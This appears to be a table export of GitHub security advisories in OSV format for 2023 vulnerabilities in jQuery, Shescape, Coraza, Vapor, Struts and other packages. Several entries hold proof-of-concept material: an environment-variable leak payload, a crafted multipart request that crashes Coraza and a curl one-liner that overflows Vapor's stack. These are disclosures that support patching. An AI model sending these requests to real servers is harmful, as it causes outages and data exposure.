schema_version
stringclasses 1
value | id
stringlengths 19
19
| modified
stringlengths 20
20
| published
stringlengths 20
20
| withdrawn
stringlengths 20
20
⌀ | aliases
stringlengths 2
20
| summary
stringlengths 20
140
| details
stringlengths 56
37.2k
| severity
stringlengths 2
92
| affected
stringlengths 88
7.07k
| references
stringlengths 139
4.72k
| database_specific
stringlengths 131
185
|
---|---|---|---|---|---|---|---|---|---|---|---|
1.4.0 | GHSA-257q-pv89-v3xv | 2023-07-07T15:07:56Z | 2023-06-26T21:30:58Z | null | ['CVE-2020-23064'] | jQuery Cross Site Scripting vulnerability | Cross Site Scripting vulnerability in jQuery v.2.2.0 until v.3.5.0 allows a remote attacker to execute arbitrary code via the `<options>` element. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'jquery'}, 'ecosystem_specific': {'affected_functions': ['jquery.htmlPrefilter']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '3.5.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '3.5.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'org.webjars.npm:jquery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '3.5.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23064'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77'}, {'type': 'WEB', 'url': 'https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#410'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/v4.3.5/vendor/assets/javascripts/jquery3.js#L5979'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/v4.4.0/vendor/assets/javascripts/jquery3.js#L6162'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-23064.yml'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JQUERY-565129'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-07T15:07:56Z', 'nvd_published_at': None} |
1.4.0 | GHSA-gx4r-fvwg-8678 | 2023-06-06T02:07:41Z | 2023-06-05T18:30:27Z | null | ['CVE-2023-3109'] | Admidio vulnerable to Cross-site Scripting | Cross-site Scripting (XSS) - Stored in GitHub repository admidio/admidio prior to 4.2.8. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.8'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3109'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/a7c211b835cafe1158932fbfcff9e5552e57510a'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6fa6070e-8f7f-43ae-8a84-e36b28256123'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:07:41Z', 'nvd_published_at': None} |
1.4.0 | GHSA-3g7p-8qhx-mc8r | 2023-06-26T16:35:03Z | 2023-06-22T20:01:39Z | null | ['CVE-2023-35931'] | Shescape potential environment variable exposure on Windows with CMD | ### Impact
This impact users of Shescape:
1. On Windows using the Windows Command Prompt (i.e. `cmd.exe`), and
2. Using `quote`/`quoteAll` or `escape`/`escapeAll` with the `interpolation` option set to `true`.
An attacker may be able to get read-only access to environment variables. Example:
```javascript
import * as cp from "node:child_process";
import * as shescape from "shescape";
// 1. Prerequisites
const options = {
shell: "cmd.exe",
// Or
shell: undefined, // Only if the default shell is CMD
// And
interpolation: true, // Only applies to `escape` and `escapeAll` usage
}
// 2. Attack (one of many)
const payload = "%PATH%";
// 3. Usage
let escapedPayload;
escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options);
// Or
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options);
// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);
// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable
```
### Patches
This bug has been patched in [v1.7.1](https://github.com/ericcornelissen/shescape/releases/tag/v1.7.1) which you can upgrade to now. No further changes are required.
### Workarounds
Alternatively, users can remove all instances of `%` from user input, either before or after using Shescape.
### References
- Shescape Pull request [#982](https://github.com/ericcornelissen/shescape/pull/982)
- Shescape commit [`d0fce70`](https://github.com/ericcornelissen/shescape/commit/d0fce70f987ac0d8331f93cb45d47e79436173ac)
- Shescape Release [v1.7.1](https://github.com/ericcornelissen/shescape/releases/tag/v1.7.1)
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'shescape'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-3g7p-8qhx-mc8r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35931'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/pull/982'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/commit/d0fce70f987ac0d8331f93cb45d47e79436173ac'}, {'type': 'PACKAGE', 'url': 'https://github.com/ericcornelissen/shescape'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/releases/tag/v1.7.1'}] | {'cwe_ids': ['CWE-526'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:39Z', 'nvd_published_at': None} |
1.4.0 | GHSA-mppv-79ch-vw6q | 2023-06-30T19:56:21Z | 2023-06-21T12:30:19Z | null | ['CVE-2023-34981'] | Apache Tomcat vulnerable to information leak | A regression in the fix for bug 66512 in Apache Tomcat 11.0.0-M5, 10.1.8, 9.0.74 and 8.5.88 meant that, if a response did not include any HTTP headers no AJP SEND_HEADERS messare woudl be sent for the response which in turn meant that at least one AJP proxy (mod_proxy_ajp) would use the response headers from the previous request leading to an information leak. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M5'}, {'fixed': '11.0.0-M6'}]}], 'versions': ['11.0.0-M5']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.8'}, {'fixed': '10.1.9'}]}], 'versions': ['10.1.8']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.74'}, {'fixed': '9.0.75'}]}], 'versions': ['9.0.74']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.88'}, {'fixed': '8.5.89'}]}], 'versions': ['8.5.88']}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34981'}, {'type': 'WEB', 'url': 'https://bz.apache.org/bugzilla/show_bug.cgi?id=66512'}, {'type': 'WEB', 'url': 'https://bz.apache.org/bugzilla/show_bug.cgi?id=66591'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/j1ksjh9m9gx1q60rtk1sbzmxhvj5h5qz'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230714-0003/'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-10.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-11.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-8.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-9.html'}] | {'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:06:39Z', 'nvd_published_at': None} |
1.4.0 | GHSA-jhpr-j7cq-3jp3 | 2023-06-22T19:59:03Z | 2023-06-22T19:59:03Z | null | ['CVE-2023-34110'] | Flask-AppBuilder vulnerable to possible disclosure of sensitive information on user error | ### Impact
An authenticated malicious actor with Admin privileges, could by adding a special character on the add, edit User forms trigger a database error, this error is surfaced back to this actor on the UI. On certain database engines this error can include the entire user row including the pbkdf2:sha256 hashed password.
### Patches
Fixed on 4.3.2
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'Flask-AppBuilder'}, 'ecosystem_specific': {'affected_functions': ['flask_appbuilder.models.sqla.interface.SQLAInterface.add', 'flask_appbuilder.models.sqla.interface.SQLAInterface.edit', 'flask_appbuilder.models.sqla.interface.SQLAInterface.delete', 'flask_appbuilder.models.sqla.interface.SQLAInterface.delete_all']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-jhpr-j7cq-3jp3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34110'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/pull/2045'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/commit/ae25ad4c87a9051ebe4a4e8f02aee73232642626'}, {'type': 'PACKAGE', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v4.3.2'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/flask-appbuilder/PYSEC-2023-94.yaml'}] | {'cwe_ids': ['CWE-209'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:59:03Z', 'nvd_published_at': None} |
1.4.0 | GHSA-c2pj-v37r-2p6h | 2023-08-25T21:35:14Z | 2023-06-26T15:48:33Z | null | ['CVE-2023-40586'] | Coraza has potential denial of service vulnerability | ### Summary
Due to the misuse of `log.Fatalf`, the application using coraza crashed after receiving crafted requests from attackers.
### Details
https://github.com/corazawaf/coraza/blob/82157f85f24c6107667bf0f686b71a72aafdf8a5/internal/bodyprocessors/multipart.go#L26-L29
The bodyprocessors of multipart uses `log.Fatalf` to handle errors from the `mime.ParseMediaType`, but `log.Fatalf` calls `os.Exit` directly after logging the error.
https://github.com/golang/go/blob/a031f4ef83edc132d5f49382bfef491161de2476/src/log/log.go#L288-L291
This means that the application will immediately crash after receiving a malicious request that triggers an error in `mime.ParseMediaType`.
### PoC
The server can be demonstrated by https://github.com/corazawaf/coraza/tree/main/examples/http-server
After sending this request
```
POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: curl/8.1.2
Accept: */*
Content-Length: 199
Content-Type: multipart/form-data; boundary=------------------------5fa6351b877326a1; a=1; a=2
Connection: close
--------------------------5fa6351b877326a1
Content-Disposition: form-data; name="file"; filename="123"
Content-Type: application/octet-stream
123
--------------------------5fa6351b877326a1--
```
The server will crash immediately. The `a=1; a=2` in `Content-Type` makes `mime: duplicate parameter name` error.
### Impact
I believe the vulnerability was introduced by the following commit: https://github.com/corazawaf/coraza/commit/24af0c8cf4f10bab558740b595712be3b85493ec.
### Mitigation
The error from `mime.ParseMediaType` should return directly. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/corazawaf/coraza/v3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/corazawaf/coraza/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'last_affected': '2.0.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/security/advisories/GHSA-c2pj-v37r-2p6h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40586'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza-caddy/issues/48'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/commit/24af0c8cf4f10bab558740b595712be3b85493ec'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/commit/a5239ba3ce839e14d9b4f9486e1b4a403dcade8c'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/commit/e1b119b83e12c64f0957e00e8cad45a1b5f012f8'}, {'type': 'PACKAGE', 'url': 'https://github.com/corazawaf/coraza'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/blob/82157f85f24c6107667bf0f686b71a72aafdf8a5/internal/bodyprocessors/multipart.go#L26-L29'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/releases/tag/v3.0.1'}, {'type': 'WEB', 'url': 'https://github.com/golang/go/blob/a031f4ef83edc132d5f49382bfef491161de2476/src/log/log.go#L288-L291'}] | {'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-26T15:48:33Z', 'nvd_published_at': None} |
1.4.0 | GHSA-q2fp-jw87-86px | 2023-06-30T20:18:57Z | 2023-06-22T12:30:14Z | null | ['CVE-2023-29931'] | laravel-s vulnerable to Local File Inclusion | laravel-s prior to 3.7.36 is vulnerable to Local File Inclusion via `/src/Illuminate/Laravel.php`. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'hhxsv5/laravel-s'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.36'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29931'}, {'type': 'WEB', 'url': 'https://github.com/hhxsv5/laravel-s/issues/437'}, {'type': 'WEB', 'url': 'https://github.com/hhxsv5/laravel-s/commit/05aa615527725f0b696da78ae4c7d3a5065bac6d'}, {'type': 'PACKAGE', 'url': 'https://github.com/hhxsv5/laravel-s'}] | {'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:00:46Z', 'nvd_published_at': None} |
1.4.0 | GHSA-hhqm-f4m4-pq39 | 2023-07-03T18:38:17Z | 2023-06-23T12:30:18Z | null | ['CVE-2023-30260'] | RaspAP raspap-webgui Command Injection vulnerability | Command injection vulnerability in RaspAP raspap-webgui 2.8.8 and earlier allows remote attackers to run arbitrary commands via crafted POST request to hostapd settings form. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'billz/raspap-webgui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.9'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30260'}, {'type': 'WEB', 'url': 'https://github.com/RaspAP/raspap-webgui/pull/1322'}, {'type': 'WEB', 'url': 'https://github.com/RaspAP/raspap-webgui/commit/238e1670fcef8b18ec4628ee74fc345607536a16'}, {'type': 'WEB', 'url': 'https://eldstal.se/advisories/230328-raspap.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/RaspAP/raspap-webgui'}] | {'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:44:57Z', 'nvd_published_at': None} |
1.4.0 | GHSA-mm87-c3x2-6f89 | 2023-07-06T21:39:56Z | 2023-06-29T12:30:24Z | null | ['CVE-2023-22886'] | Apache Airflow JDBC Provider Improper Input Validation vulnerability | Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow JDBC Provider. Airflow JDBC Provider Connection’s [Connection URL] parameters had no restrictions, which made it possible to implement RCE attacks via different type JDBC drivers, obtain airflow server permission. This issue affects Apache Airflow JDBC Provider: before 4.0.0.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22886'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/ynbjwp4n0vzql0xzhog1gkp1ovncf8j3'}] | {'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:40:04Z', 'nvd_published_at': None} |
1.4.0 | GHSA-h53w-7qw7-vh5c | 2023-06-09T22:53:51Z | 2023-06-09T22:53:51Z | null | ['CVE-2023-34232'] | Snowflake NodeJS Driver vulnerable to Command Injection | ### Issue
Snowflake was informed via our bug bounty program of a command injection vulnerability in the Snowflake NodeJS driver via SSO browser URL authentication.
### Impacted driver package:
snowflake-connector-nodejs
### Impacted version range:
before [Version 1.6.21](https://community.snowflake.com/s/article/Node-js-Driver-Release-Notes)
### Attack Scenario
In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution.
This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources.
### Solution
On April 18, 2023, Snowflake merged a patch that fixed a command injection vulnerability in the Snowflake NodeJS driver via SSO browser URL authentication. The vulnerability affected the Snowflake NodeJS driver before Version 1.6.21. We strongly recommend users upgrade to Version 1.6.21 as soon as possible via the following resources: [Snowflake NodeJS Driver](https://docs.snowflake.com/en/developer-guide/node-js/nodejs-driver)
### Additional Information
If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team). | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}] | [{'package': {'ecosystem': 'npm', 'name': 'snowflake-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.21'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-nodejs/security/advisories/GHSA-h53w-7qw7-vh5c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34232'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-nodejs/pull/465'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-nodejs/commit/0c9622ae12cd7d627df404b73a783b4a5f60728a'}, {'type': 'WEB', 'url': 'https://community.snowflake.com/s/article/Node-js-Driver-Release-Notes'}, {'type': 'PACKAGE', 'url': 'https://github.com/snowflakedb/snowflake-connector-nodejs'}] | {'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:53:51Z', 'nvd_published_at': None} |
1.4.0 | GHSA-qvxg-wjxc-r4gg | 2023-06-07T16:11:16Z | 2023-06-07T16:11:16Z | null | ['CVE-2022-31019'] | Vapor vulnerable to denial of service in URLEncodedFormDecoder | Vapor is an HTTP web framework for Swift. Vapor versions earlier than 4.61.1 are vulnerable to a denial of service in the URLEncodedFormDecoder.
### Impact
When using automatic content decoding, e.g.
```swift
app.post("foo") { request -> String in
let foo = try request.content.decode(Foo.self)
return "\(foo)"
}
```
An attacker can craft a request body that can make the server crash with the following request:
```
curl -d "array[_0][0][array][_0][0][array]$(for f in $(seq 1100); do echo -n '[_0][0][array]'; done)[string][_0]=hello%20world" http://localhost:8080/foo
```
The issue is unbounded, attacker controlled stack growth which will at some point lead to a stack overflow.
### Patches
Fixed in 4.61.1
### Workarounds
If you don't need to decode Form URL Encoded data, you can disable the `ContentConfiguration` so it won't be used. E.g. in **configure.swift**
```swift
var contentConfig = ContentConfiguration()
contentConfig.use(encoder: JSONEncoder.custom(dates: .iso8601), for: .json)
contentConfig.use(decoder: JSONDecoder.custom(dates: .iso8601), for: .json)
contentConfig.use(encoder: JSONEncoder.custom(dates: .iso8601), for: .jsonAPI)
contentConfig.use(decoder: JSONDecoder.custom(dates: .iso8601), for: .jsonAPI)
ContentConfiguration.global = contentConfig
```
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [the Vapor repo](https://github.com/vapor/vapor)
* Ask in [Vapor Discord](http://vapor.team) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/vapor/vapor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.61.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/vapor/vapor/security/advisories/GHSA-qvxg-wjxc-r4gg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-31019'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/commit/6c63226a4ab82ce53730eb1afb9ca63866fcf033'}, {'type': 'PACKAGE', 'url': 'https://github.com/vapor/vapor'}] | {'cwe_ids': ['CWE-120', 'CWE-121', 'CWE-674'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-07T16:11:16Z', 'nvd_published_at': '2022-06-09T13:15:00Z'} |
1.4.0 | GHSA-rv3x-xq3r-8j9h | 2023-06-09T19:32:32Z | 2023-06-09T19:32:32Z | null | ['CVE-2021-37634'] | LeafKit allows XSS with untrusted user input | ### Impact
This affects anyone passing unsanitised data to Leaf's variable tags. Before this fix, Leaf would not escape any strings passed to tags as variables. If an attacker managed to find a variable that was rendered with their unsanitised data, they could inject scripts into a generated Leaf page, which could enable XSS attacks if other mitigations such as a Content Security Policy were not enabled.
### Patches
This has been patched in 1.3.0
### Workarounds
Sanitise any untrusted input before passing it to Leaf and enable a CSP to block inline script and CSS data.
### References
https://github.com/vapor/leaf-kit-ghsa-rv3x-xq3r-8j9h/pull/1
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Leaf Kit](https://github.com/vapor/leaf-kit)
* Email us at [security@vapor.codes](mailto:security@vapor.codes) | [] | [{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/vapor/leaf-kit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/vapor/leaf-kit/security/advisories/GHSA-rv3x-xq3r-8j9h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37634'}, {'type': 'PACKAGE', 'url': 'https://github.com/vapor/leaf-kit'}, {'type': 'WEB', 'url': 'https://github.com/vapor/leaf-kit/releases/tag/1.3.0'}] | {'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:32:32Z', 'nvd_published_at': '2021-08-09T20:15:00Z'} |
1.4.0 | GHSA-xhg5-42rf-296r | 2023-06-16T17:53:30Z | 2023-06-06T16:45:29Z | null | ['CVE-2023-33959'] | notation-go's verification bypass can cause users to verify the wrong artifact | ### Impact
An attacker who controls or compromises a registry can lead a user to verify the wrong artifact.
### Patches
The problem has been fixed in the release [v1.0.0-rc.6](https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.6). Users should upgrade their notation-go library to [v1.0.0-rc.6](https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.6) or above.
### Workarounds
User should use secure and trusted container registries.
### Credits
The `notation` project would like to thank Adam Korczynski (@AdamKorcz) for responsibly disclosing the issue found during an security audit (facilitated by OSTIF and sponsored by CNCF) and Shiwei Zhang (@shizhMSFT), Pritesh Bandi (@priteshbandi) for root cause analysis.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/notaryproject/notation-go'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc.6'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/security/advisories/GHSA-xhg5-42rf-296r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33959'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/commit/39c8ed050a65cca3f3f308534acb612096735a64'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/commit/eba60f5aed9c9e05dee55324423c95fe34700b4c'}, {'type': 'PACKAGE', 'url': 'https://github.com/notaryproject/notation-go'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.6'}] | {'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:45:29Z', 'nvd_published_at': None} |
1.4.0 | GHSA-hp5w-w29m-vg63 | 2023-06-28T16:30:49Z | 2023-06-21T09:30:15Z | null | ['CVE-2023-34340'] | Apache Accumulo Improper Authentication vulnerability | Improper Authentication vulnerability in Apache Software Foundation Apache Accumulo.
This issue affects Apache Accumulo: 2.1.0.
Accumulo 2.1.0 contains a defect in the user authentication process that may succeed when invalid credentials are provided. Users are advised to upgrade to 2.1.1.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.apache.accumulo:accumulo-shell'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.1'}]}], 'versions': ['2.1.0']}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34340'}, {'type': 'WEB', 'url': 'https://github.com/apache/accumulo/issues/3427'}, {'type': 'WEB', 'url': 'https://github.com/apache/accumulo/issues/3433'}, {'type': 'WEB', 'url': 'https://github.com/apache/accumulo/pull/3440'}, {'type': 'WEB', 'url': 'https://github.com/apache/accumulo/commit/0f2389735fd32e0bbc93ecde5d8c814b275b21b5'}, {'type': 'WEB', 'url': 'https://accumulo.apache.org/release/accumulo-2.1.1/'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/accumulo'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/syy6jftvy9l6tlhn33o0rzwhh4rd0z4t'}] | {'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:06:51Z', 'nvd_published_at': None} |
1.4.0 | GHSA-4g42-gqrg-4633 | 2023-06-21T21:47:38Z | 2023-06-14T09:30:42Z | null | ['CVE-2023-34396'] | Apache Struts vulnerable to memory exhaustion | Denial of service via out of memory (OOM) owing to no sanity limit on normal form fields in multipart forms. When a Multipart request has non-file normal form fields, Struts used to bring them into memory as Strings without checking their sizes. This could lead to an OOM if developer has set struts.multipart.maxSize to a value equal or greater than the available memory.
Upgrade to Struts 2.5.31 or 6.1.2.1 or greater
